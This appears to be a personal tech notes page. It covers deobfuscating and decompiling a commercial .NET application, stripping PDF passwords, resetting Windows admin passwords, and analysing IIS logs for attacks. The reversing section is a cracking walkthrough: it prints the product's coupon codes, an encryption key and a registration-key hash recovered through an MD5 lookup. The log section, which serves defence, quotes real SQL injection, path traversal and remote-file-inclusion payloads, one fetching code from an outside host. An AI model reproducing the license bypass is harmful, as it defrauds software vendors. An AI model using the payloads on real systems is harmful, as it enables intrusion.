Reversing .NET applications.

All screenshots has been done with http://getgreenshot.org. This is amazing application and free. If you like it, please donate.

! If you are developing .NET application for commercial sale, you must implement protection which is other than simple obfuscation. There is tools on market which can deobfusicate .NET . One of them

Tools

De4dot http://de4dot.com/  - tool for deobfusication

FEATURES Inline methods. Decrypt strings statically or dynamically. Decrypt constants. Decrypt methods statically or dynamically. Remove proxy methods. Rename symbols. Devirtualize virtualized code. Decrypt resources. Decrypt embedded files. Remove tamper detection code Remove anti-debug code Control flow deobfuscation. Restore class fields. Convert a PE exe to a .NET exe. Removes most/all junk classes added by the obfuscator. Fixes some peverify errors. Restore the types of method parameters and fields.

OBFUSCATORS / PACKERS Agile.NET (aka CliSecure) Babel.NET CodeFort CodeVeil CodeWall CryptoObfuscator DeepSea Obfuscator Dotfuscator .NET Reactor Eazfuscator.NET Goliath.NET ILProtector MaxtoCode MPRESS Rummage Skater.NET SmartAssembly Spices.Net Xenocode

Reflector : http://www.red-gate.com/products/dotnet-development/reflector/ tool for decompiling code.

Add-ons for Reflector :

1)     If you want to modify code : http://reflexil.net/
Reflexil is an assembly editor and runs as a plug-in for Red Gate's Reflector, ILSpy and Telerik's JustDecompile. Reflexil is using Mono. Cecil, written by Jb Evain and is able to manipulate IL code and save the modified assemblies to disk. Reflexil also supports C#/VB.NET code injection. 

2)      If you need search in Reflector: http://reflectoraddins.codeplex.com/wikipage?title=CodeSearch Code Search is an add-in for .Net Reflector that allows searching within the source code.

To install addons :

And 

Decrypting obfuscated files

1)      Download and unzip de4dot .

2)      Drag and drop obfuscated file on de4dot icon

3)      You will get TestRename-cleaned.exe

In my case I took file TestRename.exe and DragNDrop on de4dot.exe. If you have 64 bit application, that drop on de4dot-x64.exe.

Couple seconds later you will see new file created TestRename-cleaned.exe. this is deobfusicated file which you can use in Reflector..

 Reflector:

You can try to use http://ilspy.net/ as well.

Simple way

1)      Open assembly :

When you will open assembly, you can search though the code for “goodies”:

Or you can simply export source code to other folder and work with it in Notepad++ or other free text editor:

In my case after exporting (decompile) code, in exported directory I was searching for  “License” text and getting list of  files which contain some interesting information:

In one file I found :
private string GetDiscountCoupon(DiscountypeEnum dt)

        {

            switch (dt)

            {

                case DiscountypeEnum.Percent10:

                    return "LIZA-DPQT";

                case DiscountypeEnum.Percent15:

                    return "LIZA-7XY4-IPCX";

                case DiscountypeEnum.Percent20:

                    return "LIZA-AM84-XDVM";

                case DiscountypeEnum.Percent25:

                    return "LIZA-R08M-AWTK";

                case DiscountypeEnum.Percent50:

                    return "LIZ-R764-LPL";

            }

            return "";

This is list of discounts.

And in another file  I found:

      Data encryptedData = new Data {

                Hex = str2

            };

            return new Symmetric(Symmetric.Provider.TripleDES, true) { Key = { Text = "EzF6@CD4-72$C-49b3-96*-329di949mcoB49}" } }.Decrypt(encryptedData).Text;

        }

        public static bool RegisterApplication(string key)

        {

            key = key.Trim();

            string str2 = "B4FA7A5DA5AF2E63D97F819A5362CDA0";

            Hash hash = new Hash(Hash.Provider.MD5);

            Data d = new Data(key);

            string hex = hash.Calculate(d).Hex;

            if (((str2.Length > 5) && (key.Length < 30)) && (hex == str2))

            {

                SetAppConfig("KH", hex, true);

                SetAppConfig("RD", Conversions.ToString(DateTime.Today), true);

                m_IsRegisteredProduct = 0;

                return true;

Where I found : string str2 = "B4FA7A5DA5AF2E63D97F819A5362CDA0";

            Hash hash = new Hash(Hash.Provider.MD5);

On the website: http://www.md5online.org/ decrypting this hash revealing the registration key.

That was easiest reversing which I ever done.

Complicated way ( will follow )

Removing password from protected PDF documents

$ pdftops [your_protected_pdf_document.pdf] out.ps

$ ps2pdf [out.ps] broken_protection_pdf_document.pdf 

http://www.cyberciti.biz/faq/removing-password-from-pdf-on-linux/

Type the following command to install the qpdf:
$ sudo apt-get install xpdf-utilsFirst, decrypt a PDF and create a postscript file, enter:
pdftops input.pdf out.ps

You will get input.ps file. This can be printed or open under Linux itself. But, you can convert it back .ps file (postscript)back to a PDF as follows:
ps2pdf out.ps ready.pdf

Please note that the ps2pdf command is part of ghostscript and it will get installed when you run xpdf-utils.
Now you can convert it with Nitro PDF https://www.gonitro.com/pro

Remove Admin Password from Win 7, 8, 2008 etc for free

http://pogostick.net/~pnh/ntpasswd/bootdisk.html

***************************************************************************
*                                                                         *
*         Windows Change Password / Registry Editor / Boot CD             *
*                                                                         *
*  (c) 1998-2014 Petter Nordahl-Hagen. Distributed under GNU GPL v2       *
*                                                                         *
* DISCLAIMER: THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTIES!          *
*             THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE       *
*             CAUSED BY THE (MIS)USE OF THIS SOFTWARE                     *
*                                                                         *
* More info at: http://pogostick.net/~pnh/ntpasswd/                       *
* Email       : pnh@pogostick.net                                         *
***************************************************************************

Just boot this CD and follow instructions.
Usually, just pressing return/enter should work, except some
drivers may have to be loaded manually with the 'm' menu option after boot.

 ---

The password reset and registry edit has now been tested with the following:

NT 3.51, NT 4, Windows 2000, Windows XP, Windows 2003 Server,
Vista, Windows 7, Server 2008, Windows 8, Windows 8.1, Server 2012

As far as I know, it will work with all Service Packs (SP) and
all editions (Professional, Server, Home etc)
Also, 64 bit windows versions shold be OK.

 ---

To make a bootable USB drive / key:

1. Copy all files from this CD onto the USB drive.
   It cannot be in a subdirectory on the drive.
   You do not need delete files already on the drive.
2. Install the bootloader
   On the USB drive, there should now be a file "syslinux.exe".
   Start a command line window (cmd.exe) with "run as administrator"
   From the command line, run the command like this:


j:\syslinux.exe -ma j:

replace j with some other letter if your USB drive is on another
drive letter than j:
On some drives, you may have to omit the -ma option if you
get an error.
If it says nothing, it probably did install the bootloader.

Please note that you may have to adjust settings in your computers BIOS
setup to boot from USB.
Also, some BIOS (often older machines) simply won't boot from USB anyway.
Unfortunately, there are extremely many different versions of BIOS,
and a lot of them are rather buggy when it comes to booting off different
media, so I am unable to help you.

Searching - Replacing in log files

Long time ago I found amazing tool to do such kind of tasks:

http://www.mind-pioneer.com/

Here -how to extract IP addresses from log file:

http://www.mind-pioneer.com/services/419_Text_file_parser.html


This is small list what you can do with IP addresses in  logs :

http://www.mind-pioneer.com/services/conv_search.php?key=IP+address&type=all&x=30&y=12

How to count apperance of distinct IP and remove specified IP range?	Advanced search and replace
How to sort lines that started with IP address?	Text sort
How to replace email address with its ROT13 encryption format?	Advanced search and replace
How to extract multiple fields from data file and create a csv file?	Text file parser
How to count the index page size of multiple web sites?	Count and statistics
How to download multiple webpages with part of url as filename?	Batch download
How to count the number of ip addresses from each country?	Count and statistics
How to remove all path information for multiple http addresses in text file?	Regular expression replace
How to extract all http links from multiple web sites in one time?	Text file parser
How to create many different html files base on a given template?	Html text generator
How to extract unique ip addresses from multiple text/html files?	Text file parser
How to extract email addresses from multiple webpages?	Text file parser
How to extract all html address from a text file?	Text file parser
How to extract email address from one or more Word files immediately?	Advanced search and replace
How to add a port 80 for all IP addresses in a text file?	Regular expression replace
How to extract all valid ip address from a list of ip addresses?	Text file parser
How to add a "mailto" link for every email address in a webpage?	Advanced search and replace
How to convert the decimal IP address into binary format with 0 and 1?	Bin Hex Oct Dec converter
How to sort all lines of ip addresses in a text file?	Text sort
How to extract multiple webpages and save all text into text files?	Batch download
How to count how many IP addresses with different classes from web logs?	Count and statistics
How to batch generate IP address list that like real IP addresses randomly?	Random word generator
How to extract all email addresses from many text files?	Text file parser
How to count the number of Unique IP address from a web log file?	Count and statistics
How to generate an IP address list base on given subnet?	Text generator

How to use Log Parser Lizard

A Log Parser GUI for Microsoft Log Parser http://www.lizard-labs.com/log_parser_lizard.aspx is a versatile tool that provides quick access to log files, XML files, CSV files, as well as data sources on the Microsoft Windows operating system. Now, businesses running Log Parser can use this query software to find exactly what they need exactly when they need it.

1)      Click on “IIS logs” button

2)      Click on “Attacks” link

3)      Modify line “3” with your path to your logs location. Keep format and do not forget to type \*.log’ in end of line.

4)      Click “Run Query” button

Predefined Queries

The following are a set of queries and their purpose we use to analyse the logs:

Main Query used for most Attacks:

This query covered following attacks: Directory discovery, XSS, XSF, SQL injection, Command injection. Part with PHP -  all attacks related to PHP technology. We monitoring these attacks, because hackers can develop new attack if they see that technology is different.

SELECT date AS Date, c-ip AS IP,cs-uri-stem AS URL_Address, cs-uri-query AS Attack_Details,

count(*) AS Attempts

FROM 'C:\IIS Logs\Logs\*.log'

Where (cs-uri-query LIKE '%./%') OR (cs-uri-query LIKE '%.php%') OR (cs-uri-query LIKE '%//.%')

OR (cs-uri-query LIKE '%src=http%') OR (cs-uri-query LIKE '%src=ftp%') OR (cs-uri-query LIKE '%l=ftp://%')

OR (cs-uri-query LIKE '%l=http://%') OR (cs-uri-query LIKE '%SELECT%') OR (cs-uri-stem LIKE '%.php%')

GROUP BY date, c-ip, cs-uri-stem, cs-uri-query ORDER BY date, c-ip, cs-uri-query

SQL Injection Attempts:

SELECT date AS Date, c-ip AS IP, cs-uri-query AS Query_Made, cs(User-Agent) AS Broser, count(*) AS Attempts FROM 'C:\IIS Logs\Logs\*.log' Where cs(User-Agent) LIKE '%sql%' GROUP BY date, c-ip, cs-uri-query, cs(User-Agent) ORDER BY date, c-ip, cs-uri-query

Query details:

·         (cs-uri-query LIKE '%./%') – Searching “./” pattern “%” means “ Any Symbol” – Directory discovering.

·         (cs-uri-query LIKE '%.php%') – Searching any record contain “***.php” – An any PHP related attacks.

·         (cs-uri-query LIKE '%//.%') - Searching “.//” pattern – Directory discovering.

·         (cs-uri-query LIKE '%src=http%') – XSS scripting.

·         (cs-uri-query LIKE '%src=ftp%') - XSS scripting

·         (cs-uri-query LIKE '%l=ftp://%') - XSS scripting

·         (cs-uri-query LIKE '%l=http://%') - XSS scripting

·         (cs-uri-query LIKE '%SELECT%') – SQL injection

1)      Click “Export to Excel”

2)      Chose location.

3)      Click “Save”.

After that you can perform log analyses and report.

WW3 Logs Analyses

When you looking into logs there is pattern of normal work. You can easily will find pattern if you just start going through logs. On some server patterns looks like this.

2012-08-31 00:00:13 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 200 0 0 234

2012-08-31 00:00:13 198.103.***.**POST /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 302 0 0 124

2012-08-31 00:00:13 198.103.***.**GET /error/GenericErrorPage.htm aspxerrorpath=/RIR_RDI/index_e.aspx 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 404 0 2 46

2012-08-31 00:01:38 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=452642&l=e 8080 - 59.167.198.149 Mozilla/5.0+(Windows+NT+6.0;+WOW64;+rv:14.0)+Gecko/20100101+Firefox/14.0.1 200 0 0 1060

2012-08-31 00:01:40 198.103.***.**POST /Reflex/index_f.aspx - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 608

2012-08-31 00:01:40 198.103.***.**GET /style/header.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 78

2012-08-31 00:01:40 198.103.***.**GET /style/footer.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 46

2012-08-31 00:01:40 198.103.***.**GET /style/refinfo.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 31

2012-08-31 00:01:40 198.103.***.**GET /style/common.css - 8080 - 74.14.188.98

This normal work contain Date, Time, IP of server, details of request, IP of remote host and details of application, OS which been used. 

When we scrolling logs down, we can see different types of attacks.

Sample of SQL injection attack

Performed to verify security of web site:

2012-07-18 17:29:33 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46

2012-07-18 17:29:34 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31

2012-07-18 17:29:50 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46

2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15

2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=4853 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31

2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15

2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%29%20AND%201249%3D9782%20AND%20%288697%3D8697 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15

Let’s make short analyses of this injection:

2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org)200 0 0 15

-          First RED part is injection attempt, 2^nd RED part is IP address. 3D Part is details of tool.

First part is always present and this major information that SQL Injection been done.

-          2^nd part is IP address. We copy this IP Address and checking where is location - http://www.iplocation.net/.

Location can help to understand if it is not internal test or VA. If location different than YOUR network, than we should start investigation if this attack penetrate our web site.

-          For investigation we using special computers with installed BackTrack distributive and with SQLMAP we trying to repeat SQL injection to see if our application or network is vulnerable to such attack.

Keep in mind that this is just sample of our attack and that some of attacks can looks different.

Provide information about other attacks and what look, difference from pattern, IP Location.

One of sample of Event logs from App logs  shows that it was some potential attack :

Exception information:     Exception type: HttpRequestValidationException    Exception message: A potentially dangerous Request.Form value was detected from the client (txtFulltext=""...jsc.djts, <a href=""http://qual...""). Request information:     Request URL: http://www.***.***:8080/RIR_RDI/index_e.aspx?n=y     Request path: /RIR_RDI/index_e.aspx     User host address: 96.47.225.66     User:      Is authenticated: False     Authentication Type:      Thread account name: IIS APPPOOL\CLFApps

You can see that Exception message shows “ Potential Danger Request…”, we can google.com it and see that it can be related to security of windows form on .NET . But we must be sure that it is not repetitive attempt penetrate web site. Unfortunately without sniffer we cannot see whole URL ( href=”http://qual... “”), therefore we need to perform cross search in other logs for same time. In this situation simple Google search shows that this IP address been reported as Spam Bot, which trying to submit messages in forms. As our web site have form, therefore Spam Bot automatically trying to submit some post there.

Sample of CSS ( Cross Site Scripting) or XSS

2012-08-16 03:40:25 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249

2012-08-16 03:40:26 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249

2012-08-16 03:40:28 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249

2012-08-16 03:40:29 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105

SQL Injection:

2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%27%60%28%5B%7B%5E%7E 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 483

2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D8 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 405

2012-09-05 18:18:46 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D3 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 499

Possibly directory enumeration attack:

2012-08-22 12:37:56 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109

2012-08-22 12:37:56 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109

2012-08-22 12:37:57 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78

2012-08-22 12:37:57 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78